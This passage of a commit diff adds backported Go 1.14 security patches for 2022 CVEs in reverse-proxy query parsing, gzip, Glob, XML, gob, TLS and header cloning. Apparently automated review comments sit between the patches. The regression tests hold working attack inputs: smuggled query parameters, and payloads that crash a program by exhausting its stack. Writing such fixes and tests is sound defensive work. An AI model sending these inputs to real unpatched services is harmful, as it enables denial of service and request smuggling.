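+ src/net/http/httputil/reverseproxy_test.go | 74 ++++++++++++++++++++++
+ 2 files changed, 110 insertions(+)
+
+diff --git a/src/net/http/httputil/reverseproxy.go b/src/net/http/httputil/reverseproxy.go
+index 2072a5f..c6fb873 100644
+--- a/src/net/http/httputil/reverseproxy.go
++++ b/src/net/http/httputil/reverseproxy.go
+@@ -212,6 +212,9 @@ func (p *ReverseProxy) ServeHTTP(rw http.ResponseWriter, req *http.Request) {
+ }
+
+ p.Director(outreq)
++ if outreq.Form != nil {
++ outreq.URL.RawQuery = cleanQueryParams(outreq.URL.RawQuery)
++ }
+ outreq.Close = false
+
+ reqUpType := upgradeType(outreq.Header)
+@@ -561,3 +564,36 @@ func (c switchProtocolCopier) copyToBackend(errc chan<- error) {
+ _, err := io.Copy(c.backend, c.user)
+ errc <- err
+ }
++
++func cleanQueryParams(s string) string {
++ reencode := func(s string) string {
++ v, _ := url.ParseQuery(s)
++ return v.Encode()
++ }
++ for i := 0; i < len(s); {
++ switch s[i] {
++ case ';':
++ return reencode(s)
++ case '%':
++ if i+2 >= len(s) || !ishex(s[i+1]) || !ishex(s[i+2]) {
++ return reencode(s)
++ }
++ i += 3
++ default:
++ i++
++ }
++ }
++ return s
++}
++
++func ishex(c byte) bool {
++ switch {
++ case '0' <= c && c <= '9':
++ return true
++ case 'a' <= c && c <= 'f':
++ return true
++ case 'A' <= c && c <= 'F':
++ return true
++ }
++ return false
++}
+diff --git a/src/net/http/httputil/reverseproxy_test.go b/src/net/http/httputil/reverseproxy_test.go
+index 9a7223a..bc87a3b 100644
+--- a/src/net/http/httputil/reverseproxy_test.go
++++ b/src/net/http/httputil/reverseproxy_test.go
+@@ -1269,3 +1269,77 @@ func TestSingleJoinSlash(t *testing.T) {
+ }
+ }
+ }
++
++const (
++ testWantsCleanQuery = true
++ testWantsRawQuery = false
++)
++
++func TestReverseProxyQueryParameterSmugglingDirectorDoesNotParseForm(t *testing.T) {
++ testReverseProxyQueryParameterSmuggling(t, testWantsRawQuery, func(u *url.URL) *ReverseProxy {
++ proxyHandler := NewSingleHostReverseProxy(u)
++ oldDirector := proxyHandler.Director
++ proxyHandler.Director = func(r *http.Request) {
++ oldDirector(r)
++ }
++ return proxyHandler
++ })
++}
++
++func TestReverseProxyQueryParameterSmugglingDirectorParsesForm(t *testing.T) {
++ testReverseProxyQueryParameterSmuggling(t, testWantsCleanQuery, func(u *url.URL) *ReverseProxy {
++ proxyHandler := NewSingleHostReverseProxy(u)
++ oldDirector := proxyHandler.Director
++ proxyHandler.Director = func(r *http.Request) {
++ // Parsing the form causes ReverseProxy to remove unparsable
++ // query parameters before forwarding.
++ r.FormValue("a")
++ oldDirector(r)
++ }
++ return proxyHandler
++ })
++}
++
++func testReverseProxyQueryParameterSmuggling(t *testing.T, wantCleanQuery bool, newProxy func(*url.URL) *ReverseProxy) {
++ const content = "response_content"
++ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++ w.Write([]byte(r.URL.RawQuery))
++ }))
++ defer backend.Close()
++ backendURL, err := url.Parse(backend.URL)
++ if err != nil {
++ t.Fatal(err)
++ }
++ proxyHandler := newProxy(backendURL)
++ frontend := httptest.NewServer(proxyHandler)
++ defer frontend.Close()
++
++ // Don't spam output with logs of queries containing semicolons.
++ backend.Config.ErrorLog = log.New(io.Discard, "", 0)
++ frontend.Config.ErrorLog = log.New(io.Discard, "", 0)
++
++ for _, test := range []struct {
++ rawQuery string
++ cleanQuery string
++ }{{
++ rawQuery: "a=1&a=2;b=3",
++ cleanQuery: "a=1",
++ }, {
++ rawQuery: "a=1&a=%zz&b=3",
++ cleanQuery: "a=1&b=3",
++ }} {
++ res, err := frontend.Client().Get(frontend.URL + "?" + test.rawQuery)
++ if err != nil {
++ t.Fatalf("Get: %v", err)
++ }
++ defer res.Body.Close()
++ body, _ := io.ReadAll(res.Body)
++ wantQuery := test.rawQuery
++ if wantCleanQuery {
++ wantQuery = test.cleanQuery
++ }
++ if got, want := string(body), wantQuery; got != want {
++ t.Errorf("proxy forwarded raw query %q as %q, want %q", test.rawQuery, got, want)
++ }
++ }
++}
+--
+2.25.1
+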
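Review bot: The new test in `reverseproxy_test.go` calls `io.Discard` and `io.ReadAll`, which were added to package `io` in Go 1.16, while this patch lands under `go-1.14`; the `net/http/httputil` test package would not compile there. Use the `ioutil` equivalents, `log.New(ioutil.Discard, "", 0)` and `body, _ := ioutil.ReadAll(res.Body)`, provided `io/ioutil` is imported in that test file (its import block is outside the hunk). The CVE-2022-2879 patch in this same commit already uses `ioutil.ReadAll`, so this keeps the series consistent. The header text also mentions `ReverseProxy.Rewrite`, which the visible hunks neither add nor reference, so that sentence may not apply to this backport.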
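diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch
new file mode 100644
index 0000000000..47313a547f
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch
@@ -0,0 +1,47 @@
+From 8d0bbb5a6280c2cf951241ec7f6579c90d38df57 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 10:55:08 +0530
+Subject: [PATCH] CVE-2022-30629
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c15a8e2dbb5ac376a6ed890735341b812d6b965c]
+CVE: CVE-2022-30629
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/crypto/tls/handshake_server_tls13.go | 14 ++++++++++++++
+ 1 file changed, 14 insertions(+)
+
+diff --git a/src/crypto/tls/handshake_server_tls13.go b/src/crypto/tls/handshake_server_tls13.go
+index 5432145..d91797e 100644
+--- a/src/crypto/tls/handshake_server_tls13.go
++++ b/src/crypto/tls/handshake_server_tls13.go
+@@ -9,6 +9,7 @@ import (
+ "crypto"
+ "crypto/hmac"
+ "crypto/rsa"
++ "encoding/binary"
+ "errors"
+ "hash"
+ "io"
+@@ -742,6 +743,19 @@ func (hs *serverHandshakeStateTLS13) sendSessionTickets() error {
+ }
+ m.lifetime = uint32(maxSessionTicketLifetime / time.Second)
+
++ // ticket_age_add is a random 32-bit value. See RFC 8446, section 4.6.1
++ // The value is not stored anywhere; we never need to check the ticket age
++ // because 0-RTT is not supported.
++ ageAdd := make([]byte, 4)
++ _, err = hs.c.config.rand().Read(ageAdd)
++ if err != nil {
++ return err
++ }
++ m.ageAdd = binary.LittleEndian.Uint32(ageAdd)
++
++ // ticket_nonce, which must be unique per connection, is always left at
++ // zero because we only ever send one ticket per connection.
++
+ if _, err := c.writeRecord(recordTypeHandshake, m.marshal()); err != nil {
+ return err
+ }
+--
+2.25.1
+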
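Review bot: The added `_, err = hs.c.config.rand().Read(ageAdd)` in sendSessionTickets accepts a short read: an `io.Reader` may return fewer than four bytes with a nil error, which would leave the remaining bytes of `ticket_age_add` at zero. `io` is already in this file's import block, so `_, err = io.ReadFull(hs.c.config.rand(), ageAdd)` would make the four-byte requirement explicit; whether a configured random source can short-read in practice is not visible from this hunk. The patch header also carries only the CVE id as its subject, so a one-line description of what was wrong would help anyone auditing the recipe later; the other CVE-2022-306xx patches in this commit have the same bare subject. sendSessionTickets starts and ends outside the hunk.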
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch
new file mode 100644
index 0000000000..5dcfd27f16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch
@@ -0,0 +1,116 @@
1From d10fc3a84e3344f2421c1dd3046faa50709ab4d5 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 25 Aug 2022 11:01:21 +0530
4Subject: [PATCH] CVE-2022-30631
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/0117dee7dccbbd7803d88f65a2ce8bd686219ad3]
7CVE: CVE-2022-30631
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/compress/gzip/gunzip.go | 60 +++++++++++++++-----------------
11 src/compress/gzip/gunzip_test.go | 16 +++++++++
12 2 files changed, 45 insertions(+), 31 deletions(-)
13
14diff --git a/src/compress/gzip/gunzip.go b/src/compress/gzip/gunzip.go
15index 924bce1..237b2b9 100644
16--- a/src/compress/gzip/gunzip.go
17+++ b/src/compress/gzip/gunzip.go
18@@ -248,42 +248,40 @@ func (z *Reader) Read(p []byte) (n int, err error) {
19 return 0, z.err
20 }
21
22- n, z.err = z.decompressor.Read(p)
23- z.digest = crc32.Update(z.digest, crc32.IEEETable, p[:n])
24- z.size += uint32(n)
25- if z.err != io.EOF {
26- // In the normal case we return here.
27- return n, z.err
28- }
29+ for n == 0 {
30+ n, z.err = z.decompressor.Read(p)
31+ z.digest = crc32.Update(z.digest, crc32.IEEETable, p[:n])
32+ z.size += uint32(n)
33+ if z.err != io.EOF {
34+ // In the normal case we return here.
35+ return n, z.err
36+ }
37
38- // Finished file; check checksum and size.
39- if _, err := io.ReadFull(z.r, z.buf[:8]); err != nil {
40- z.err = noEOF(err)
41- return n, z.err
42- }
43- digest := le.Uint32(z.buf[:4])
44- size := le.Uint32(z.buf[4:8])
45- if digest != z.digest || size != z.size {
46- z.err = ErrChecksum
47- return n, z.err
48- }
49- z.digest, z.size = 0, 0
50+ // Finished file; check checksum and size.
51+ if _, err := io.ReadFull(z.r, z.buf[:8]); err != nil {
52+ z.err = noEOF(err)
53+ return n, z.err
54+ }
55+ digest := le.Uint32(z.buf[:4])
56+ size := le.Uint32(z.buf[4:8])
57+ if digest != z.digest || size != z.size {
58+ z.err = ErrChecksum
59+ return n, z.err
60+ }
61+ z.digest, z.size = 0, 0
62
63- // File is ok; check if there is another.
64- if !z.multistream {
65- return n, io.EOF
66- }
67- z.err = nil // Remove io.EOF
68+ // File is ok; check if there is another.
69+ if !z.multistream {
70+ return n, io.EOF
71+ }
72+ z.err = nil // Remove io.EOF
73
74- if _, z.err = z.readHeader(); z.err != nil {
75- return n, z.err
76+ if _, z.err = z.readHeader(); z.err != nil {
77+ return n, z.err
78+ }
79 }
80
81- // Read from next file, if necessary.
82- if n > 0 {
83- return n, nil
84- }
85- return z.Read(p)
86+ return n, nil
87 }
88
89 // Close closes the Reader. It does not close the underlying io.Reader.
90diff --git a/src/compress/gzip/gunzip_test.go b/src/compress/gzip/gunzip_test.go
91index 1b01404..95220ae 100644
92--- a/src/compress/gzip/gunzip_test.go
93+++ b/src/compress/gzip/gunzip_test.go
94@@ -516,3 +516,19 @@ func TestTruncatedStreams(t *testing.T) {
95 }
96 }
97 }
98+
99+func TestCVE202230631(t *testing.T) {
100+ var empty = []byte{0x1f, 0x8b, 0x08, 0x00, 0xa7, 0x8f, 0x43, 0x62, 0x00,
101+ 0x03, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
102+ r := bytes.NewReader(bytes.Repeat(empty, 4e6))
103+ z, err := NewReader(r)
104+ if err != nil {
105+ t.Fatalf("NewReader: got %v, want nil", err)
106+ }
107+ // Prior to CVE-2022-30631 fix, this would cause an unrecoverable panic due
108+ // to stack exhaustion.
109+ _, err = z.Read(make([]byte, 10))
110+ if err != io.EOF {
111+ t.Errorf("Reader.Read: got %v, want %v", err, io.EOF)
112+ }
113+}
114--
1152.25.1
116
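Review bot: The new `for n == 0` loop in Reader.Read has no comment saying why it replaces the old tail call `return z.Read(p)`, and that reason is the whole security fix. I would add above the loop `// Loop rather than recurse: a long run of empty members must not grow the stack (CVE-2022-30631).` The loop still consumes every empty member inside a single Read call, so the work per call stays proportional to the input, and callers reading untrusted streams still need their own size limit. The added test checks only `err`; asserting that the returned `n` is 0 as well would pin the full contract.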
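diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch
new file mode 100644
index 0000000000..c54ef56a0e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch
@@ -0,0 +1,71 @@
+From 35d1dfe9746029aea9027b405c75555d41ffd2f8 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 13:12:40 +0530
+Subject: [PATCH] CVE-2022-30632
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/76f8b7304d1f7c25834e2a0cc9e88c55276c47df]
+CVE: CVE-2022-30632
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/path/filepath/match.go | 16 +++++++++++++++-
+ src/path/filepath/match_test.go | 10 ++++++++++
+ 2 files changed, 25 insertions(+), 1 deletion(-)
+
+diff --git a/src/path/filepath/match.go b/src/path/filepath/match.go
+index 46badb5..ba68daa 100644
+--- a/src/path/filepath/match.go
++++ b/src/path/filepath/match.go
+@@ -232,6 +232,20 @@ func getEsc(chunk string) (r rune, nchunk string, err error) {
+ // The only possible returned error is ErrBadPattern, when pattern
+ // is malformed.
+ func Glob(pattern string) (matches []string, err error) {
++ return globWithLimit(pattern, 0)
++}
++
++func globWithLimit(pattern string, depth int) (matches []string, err error) {
++ // This limit is used prevent stack exhaustion issues. See CVE-2022-30632.
++ const pathSeparatorsLimit = 10000
++ if depth == pathSeparatorsLimit {
++ return nil, ErrBadPattern
++ }
++
++ // Check pattern is well-formed.
++ if _, err := Match(pattern, ""); err != nil {
++ return nil, err
++ }
+ if !hasMeta(pattern) {
+ if _, err = os.Lstat(pattern); err != nil {
+ return nil, nil
+@@ -257,7 +271,7 @@ func Glob(pattern string) (matches []string, err error) {
+ }
+
+ var m []string
+- m, err = Glob(dir)
++ m, err = globWithLimit(dir, depth+1)
+ if err != nil {
+ return
+ }
+diff --git a/src/path/filepath/match_test.go b/src/path/filepath/match_test.go
+index b865762..c37c812 100644
+--- a/src/path/filepath/match_test.go
++++ b/src/path/filepath/match_test.go
+@@ -154,6 +154,16 @@ func TestGlob(t *testing.T) {
+ }
+ }
+
++func TestCVE202230632(t *testing.T) {
++ // Prior to CVE-2022-30632, this would cause a stack exhaustion given a
++ // large number of separators (more than 4,000,000). There is now a limit
++ // of 10,000.
++ _, err := Glob("/*" + strings.Repeat("/", 10001))
++ if err != ErrBadPattern {
++ t.Fatalf("Glob returned err=%v, want ErrBadPattern", err)
++ }
++}
++
+ func TestGlobError(t *testing.T) {
+ _, err := Glob("[]")
+ if err == nil {
+--
+2.25.1
+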
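Review bot: The depth guard in globWithLimit uses `depth == pathSeparatorsLimit`, which holds only because the one visible recursive call increments by exactly one; `if depth >= pathSeparatorsLimit` fails closed if a future caller ever passes a larger value. The `Match(pattern, "")` well-formedness check is also introduced by this backport and sits inside the recursive function, so it appears to run again at every directory level and makes Glob reject malformed patterns before touching the file system. If that behaviour change is intended for this branch, it deserves a line in the patch header, which currently names only the CVE. The comment should read `// This limit is used to prevent stack exhaustion issues. See CVE-2022-30632.` globWithLimit's body continues outside both hunks.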
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch
new file mode 100644
index 0000000000..c16cb5f50c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch
@@ -0,0 +1,131 @@
1From ab6e2ffdcab0501bcc2de4b196c1c18ae2301d4b Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 25 Aug 2022 13:29:55 +0530
4Subject: [PATCH] CVE-2022-30633
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/2678d0c957193dceef336c969a9da74dd716a827]
7CVE: CVE-2022-30633
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/encoding/xml/read.go | 27 +++++++++++++++++++--------
11 src/encoding/xml/read_test.go | 14 ++++++++++++++
12 2 files changed, 33 insertions(+), 8 deletions(-)
13
14diff --git a/src/encoding/xml/read.go b/src/encoding/xml/read.go
15index 10a60ee..4ffed80 100644
16--- a/src/encoding/xml/read.go
17+++ b/src/encoding/xml/read.go
18@@ -148,7 +148,7 @@ func (d *Decoder) DecodeElement(v interface{}, start *StartElement) error {
19 if val.Kind() != reflect.Ptr {
20 return errors.New("non-pointer passed to Unmarshal")
21 }
22- return d.unmarshal(val.Elem(), start)
23+ return d.unmarshal(val.Elem(), start, 0)
24 }
25
26 // An UnmarshalError represents an error in the unmarshaling process.
27@@ -304,8 +304,15 @@ var (
28 textUnmarshalerType = reflect.TypeOf((*encoding.TextUnmarshaler)(nil)).Elem()
29 )
30
31+const maxUnmarshalDepth = 10000
32+
33+var errExeceededMaxUnmarshalDepth = errors.New("exceeded max depth")
34+
35 // Unmarshal a single XML element into val.
36-func (d *Decoder) unmarshal(val reflect.Value, start *StartElement) error {
37+func (d *Decoder) unmarshal(val reflect.Value, start *StartElement, depth int) error {
38+ if depth >= maxUnmarshalDepth {
39+ return errExeceededMaxUnmarshalDepth
40+ }
41 // Find start element if we need it.
42 if start == nil {
43 for {
44@@ -398,7 +405,7 @@ func (d *Decoder) unmarshal(val reflect.Value, start *StartElement) error {
45 v.Set(reflect.Append(val, reflect.Zero(v.Type().Elem())))
46
47 // Recur to read element into slice.
48- if err := d.unmarshal(v.Index(n), start); err != nil {
49+ if err := d.unmarshal(v.Index(n), start, depth+1); err != nil {
50 v.SetLen(n)
51 return err
52 }
53@@ -521,13 +528,15 @@ Loop:
54 case StartElement:
55 consumed := false
56 if sv.IsValid() {
57- consumed, err = d.unmarshalPath(tinfo, sv, nil, &t)
58+ // unmarshalPath can call unmarshal, so we need to pass the depth through so that
59+ // we can continue to enforce the maximum recusion limit.
60+ consumed, err = d.unmarshalPath(tinfo, sv, nil, &t, depth)
61 if err != nil {
62 return err
63 }
64 if !consumed && saveAny.IsValid() {
65 consumed = true
66- if err := d.unmarshal(saveAny, &t); err != nil {
67+ if err := d.unmarshal(saveAny, &t, depth+1); err != nil {
68 return err
69 }
70 }
71@@ -672,7 +681,7 @@ func copyValue(dst reflect.Value, src []byte) (err error) {
72 // The consumed result tells whether XML elements have been consumed
73 // from the Decoder until start's matching end element, or if it's
74 // still untouched because start is uninteresting for sv's fields.
75-func (d *Decoder) unmarshalPath(tinfo *typeInfo, sv reflect.Value, parents []string, start *StartElement) (consumed bool, err error) {
76+func (d *Decoder) unmarshalPath(tinfo *typeInfo, sv reflect.Value, parents []string, start *StartElement, depth int) (consumed bool, err error) {
77 recurse := false
78 Loop:
79 for i := range tinfo.fields {
80@@ -687,7 +696,7 @@ Loop:
81 }
82 if len(finfo.parents) == len(parents) && finfo.name == start.Name.Local {
83 // It's a perfect match, unmarshal the field.
84- return true, d.unmarshal(finfo.value(sv), start)
85+ return true, d.unmarshal(finfo.value(sv), start, depth+1)
86 }
87 if len(finfo.parents) > len(parents) && finfo.parents[len(parents)] == start.Name.Local {
88 // It's a prefix for the field. Break and recurse
89@@ -716,7 +725,9 @@ Loop:
90 }
91 switch t := tok.(type) {
92 case StartElement:
93- consumed2, err := d.unmarshalPath(tinfo, sv, parents, &t)
94+ // the recursion depth of unmarshalPath is limited to the path length specified
95+ // by the struct field tag, so we don't increment the depth here.
96+ consumed2, err := d.unmarshalPath(tinfo, sv, parents, &t, depth)
97 if err != nil {
98 return true, err
99 }
100diff --git a/src/encoding/xml/read_test.go b/src/encoding/xml/read_test.go
101index 8c2e70f..6a20b1a 100644
102--- a/src/encoding/xml/read_test.go
103+++ b/src/encoding/xml/read_test.go
104@@ -5,6 +5,7 @@
105 package xml
106
107 import (
108+ "errors"
109 "io"
110 "reflect"
111 "strings"
112@@ -1079,3 +1080,16 @@ func TestUnmarshalWhitespaceAttrs(t *testing.T) {
113 t.Fatalf("whitespace attrs: Unmarshal:\nhave: %#+v\nwant: %#+v", v, want)
114 }
115 }
116+
117+func TestCVE202228131(t *testing.T) {
118+ type nested struct {
119+ Parent *nested `xml:",any"`
120+ }
121+ var n nested
122+ err := Unmarshal(bytes.Repeat([]byte("<a>"), maxUnmarshalDepth+1), &n)
123+ if err == nil {
124+ t.Fatal("Unmarshal did not fail")
125+ } else if !errors.Is(err, errExeceededMaxUnmarshalDepth) {
126+ t.Fatalf("Unmarshal unexpected error: got %q, want %q", err, errExeceededMaxUnmarshalDepth)
127+ }
128+}
129--
1302.25.1
131
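Review bot: The new test calls `bytes.Repeat`, but the import hunk for read_test.go adds only `"errors"`, and its context lines show `import (` followed directly by `"io"`, so `bytes` does not appear to be imported in this file. If that is right, the test file stops compiling as soon as the package tests are built; add `"bytes"` next to `"errors"` in that hunk. The test is named `TestCVE202228131` although this patch is filed as CVE-2022-30633, which will mislead anyone searching for the regression test by CVE id. The identifier `errExeceededMaxUnmarshalDepth` and the comment word `recusion` are misspelled; the identifier is presumably kept to match upstream, but the comment can be fixed.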
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch
new file mode 100644
index 0000000000..73959f70fa
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch
@@ -0,0 +1,120 @@
1From fdd4316737ed5681689a1f40802ffa0805e5b11c Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Fri, 26 Aug 2022 12:17:05 +0530
4Subject: [PATCH] CVE-2022-30635
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/cd54600b866db0ad068ab8df06c7f5f6cb55c9b3]
7CVE-2022-30635
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/encoding/gob/decode.go | 19 ++++++++++++-------
11 src/encoding/gob/gobencdec_test.go | 24 ++++++++++++++++++++++++
12 2 files changed, 36 insertions(+), 7 deletions(-)
13
14diff --git a/src/encoding/gob/decode.go b/src/encoding/gob/decode.go
15index d2f6c74..0e0ec75 100644
16--- a/src/encoding/gob/decode.go
17+++ b/src/encoding/gob/decode.go
18@@ -871,8 +871,13 @@ func (dec *Decoder) decOpFor(wireId typeId, rt reflect.Type, name string, inProg
19 return &op
20 }
21
22+var maxIgnoreNestingDepth = 10000
23+
24 // decIgnoreOpFor returns the decoding op for a field that has no destination.
25-func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp) *decOp {
26+func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp, depth int) *decOp {
27+ if depth > maxIgnoreNestingDepth {
28+ error_(errors.New("invalid nesting depth"))
29+ }
30 // If this type is already in progress, it's a recursive type (e.g. map[string]*T).
31 // Return the pointer to the op we're already building.
32 if opPtr := inProgress[wireId]; opPtr != nil {
33@@ -896,7 +901,7 @@ func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp)
34 errorf("bad data: undefined type %s", wireId.string())
35 case wire.ArrayT != nil:
36 elemId := wire.ArrayT.Elem
37- elemOp := dec.decIgnoreOpFor(elemId, inProgress)
38+ elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
39 op = func(i *decInstr, state *decoderState, value reflect.Value) {
40 state.dec.ignoreArray(state, *elemOp, wire.ArrayT.Len)
41 }
42@@ -904,15 +909,15 @@ func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp)
43 case wire.MapT != nil:
44 keyId := dec.wireType[wireId].MapT.Key
45 elemId := dec.wireType[wireId].MapT.Elem
46- keyOp := dec.decIgnoreOpFor(keyId, inProgress)
47- elemOp := dec.decIgnoreOpFor(elemId, inProgress)
48+ keyOp := dec.decIgnoreOpFor(keyId, inProgress, depth+1)
49+ elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
50 op = func(i *decInstr, state *decoderState, value reflect.Value) {
51 state.dec.ignoreMap(state, *keyOp, *elemOp)
52 }
53
54 case wire.SliceT != nil:
55 elemId := wire.SliceT.Elem
56- elemOp := dec.decIgnoreOpFor(elemId, inProgress)
57+ elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
58 op = func(i *decInstr, state *decoderState, value reflect.Value) {
59 state.dec.ignoreSlice(state, *elemOp)
60 }
61@@ -1073,7 +1078,7 @@ func (dec *Decoder) compileSingle(remoteId typeId, ut *userTypeInfo) (engine *de
62 func (dec *Decoder) compileIgnoreSingle(remoteId typeId) *decEngine {
63 engine := new(decEngine)
64 engine.instr = make([]decInstr, 1) // one item
65- op := dec.decIgnoreOpFor(remoteId, make(map[typeId]*decOp))
66+ op := dec.decIgnoreOpFor(remoteId, make(map[typeId]*decOp), 0)
67 ovfl := overflow(dec.typeString(remoteId))
68 engine.instr[0] = decInstr{*op, 0, nil, ovfl}
69 engine.numInstr = 1
70@@ -1118,7 +1123,7 @@ func (dec *Decoder) compileDec(remoteId typeId, ut *userTypeInfo) (engine *decEn
71 localField, present := srt.FieldByName(wireField.Name)
72 // TODO(r): anonymous names
73 if !present || !isExported(wireField.Name) {
74- op := dec.decIgnoreOpFor(wireField.Id, make(map[typeId]*decOp))
75+ op := dec.decIgnoreOpFor(wireField.Id, make(map[typeId]*decOp), 0)
76 engine.instr[fieldnum] = decInstr{*op, fieldnum, nil, ovfl}
77 continue
78 }
79diff --git a/src/encoding/gob/gobencdec_test.go b/src/encoding/gob/gobencdec_test.go
80index 6d2c8db..1b52ecc 100644
81--- a/src/encoding/gob/gobencdec_test.go
82+++ b/src/encoding/gob/gobencdec_test.go
83@@ -12,6 +12,7 @@ import (
84 "fmt"
85 "io"
86 "net"
87+ "reflect"
88 "strings"
89 "testing"
90 "time"
91@@ -796,3 +797,26 @@ func TestNetIP(t *testing.T) {
92 t.Errorf("decoded to %v, want 1.2.3.4", ip.String())
93 }
94 }
95+
96+func TestIngoreDepthLimit(t *testing.T) {
97+ // We don't test the actual depth limit because it requires building an
98+ // extremely large message, which takes quite a while.
99+ oldNestingDepth := maxIgnoreNestingDepth
100+ maxIgnoreNestingDepth = 100
101+ defer func() { maxIgnoreNestingDepth = oldNestingDepth }()
102+ b := new(bytes.Buffer)
103+ enc := NewEncoder(b)
104+ typ := reflect.TypeOf(int(0))
105+ nested := reflect.ArrayOf(1, typ)
106+ for i := 0; i < 100; i++ {
107+ nested = reflect.ArrayOf(1, nested)
108+ }
109+ badStruct := reflect.New(reflect.StructOf([]reflect.StructField{{Name: "F", Type: nested}}))
110+ enc.Encode(badStruct.Interface())
111+ dec := NewDecoder(b)
112+ var output struct{ Hello int }
113+ expectedErr := "invalid nesting depth"
114+ if err := dec.Decode(&output); err == nil || err.Error() != expectedErr {
115+ t.Errorf("Decode didn't fail with depth limit of 100: want %q, got %q", expectedErr, err)
116+ }
117+}
118--
1192.25.1
120
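Review bot: Line 7 of this patch header reads `CVE-2022-30635` without the `CVE:` tag that the other patches in this commit use, so it should be `CVE: CVE-2022-30635`; CVE-2022-41717.patch further down has the same omission. Any tooling that reads the tag from the patch body rather than from the file name would not count this CVE as patched, so it is worth confirming how the layer's CVE check picks it up. In the added test, `enc.Encode(badStruct.Interface())` drops its error, so a failed encode would surface as a confusing decode mismatch; `if err := enc.Encode(badStruct.Interface()); err != nil { t.Fatal(err) }` pins it. The test name `TestIngoreDepthLimit` is misspelled.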
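diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch
new file mode 100644
index 0000000000..aab98e99fd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch
@@ -0,0 +1,49 @@
+From 0fe3adec199e8cd2c101933f75d8cd617de70350 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 26 Aug 2022 12:48:13 +0530
+Subject: [PATCH] CVE-2022-32148
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ed2f33e1a7e0d18f61bd56f7ee067331d612c27e]
+CVE: CVE-2022-32148
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/net/http/header.go | 6 ++++++
+ src/net/http/header_test.go | 5 +++++
+ 2 files changed, 11 insertions(+)
+
+diff --git a/src/net/http/header.go b/src/net/http/header.go
+index b9b5391..221f613 100644
+--- a/src/net/http/header.go
++++ b/src/net/http/header.go
+@@ -100,6 +100,12 @@ func (h Header) Clone() Header {
+ sv := make([]string, nv) // shared backing array for headers' values
+ h2 := make(Header, len(h))
+ for k, vv := range h {
++ if vv == nil {
++ // Preserve nil values. ReverseProxy distinguishes
++ // between nil and zero-length header values.
++ h2[k] = nil
++ continue
++ }
+ n := copy(sv, vv)
+ h2[k] = sv[:n:n]
+ sv = sv[n:]
+diff --git a/src/net/http/header_test.go b/src/net/http/header_test.go
+index 4789362..80c0035 100644
+--- a/src/net/http/header_test.go
++++ b/src/net/http/header_test.go
+@@ -235,6 +235,11 @@ func TestCloneOrMakeHeader(t *testing.T) {
+ in: Header{"foo": {"bar"}},
+ want: Header{"foo": {"bar"}},
+ },
++ {
++ name: "nil value",
++ in: Header{"foo": nil},
++ want: Header{"foo": nil},
++ },
+ }
+
+ for _, tt := range tests {
+--
+2.25.1
+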
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch
new file mode 100644
index 0000000000..15fda7de1b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch
@@ -0,0 +1,113 @@
1From 027e7e1578d3d7614f7586eff3894b83d9709e14 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Mon, 29 Aug 2022 10:08:34 +0530
4Subject: [PATCH] CVE-2022-32189
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/703c8ab7e5ba75c95553d4e249309297abad7102]
